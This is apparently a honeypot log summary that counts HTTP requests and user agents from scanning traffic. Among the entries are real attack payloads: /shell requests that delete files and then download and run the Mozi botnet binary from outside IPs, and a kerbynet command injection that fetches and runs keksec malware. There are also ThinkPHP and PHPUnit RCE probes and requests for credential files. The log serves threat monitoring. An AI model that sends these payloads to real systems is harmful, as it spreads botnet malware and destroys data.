1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//125[.]26[.]241[.]203:45027/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//205[.]236[.]184[.]238:35121/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 HEAD http[:]//112[.]124[.]42[.]80:63435/ HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/ViewLog.asp HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:SG

Source IP address list


User-Agent list

Count User-Agent
4 -
1 ApiTool
1 Go-http-client/1.1
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 zgrab/0.x
6 TBI-WebScanner/0.0.1 (+https://leakix.net/)
2 python-requests/2.3.0 CPython/2.7.18 Windows/10

Request list

Count Method Request Protocol
1 \x16\x03\x01
1 CONNECT leakix[.]net/:443 HTTP/1.1
5 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /actuator/health HTTP/1.1
2 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
2 GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0a/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%22wget%20http[:]//107[.]174[.]133[.]119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;curl%20http[:]//107[.]174[.]133[.]119/bins/keksec.x86%20-O%20/tmp/.keksec.x86;%20chmod%20777%20/tmp/.keksec.x86;%20/tmp/.keksec.x86%22%0a' HTTP/1.1
1 GET /composer.json HTTP/1.1
1 GET /composer.lock HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
1 GET /frontend_dev.php/$ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /portal/redlion HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 OPTIONS / HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
6 POST /boaform/admin/formLogin HTTP/1.1
1 POST /editBlackAndWhiteList HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1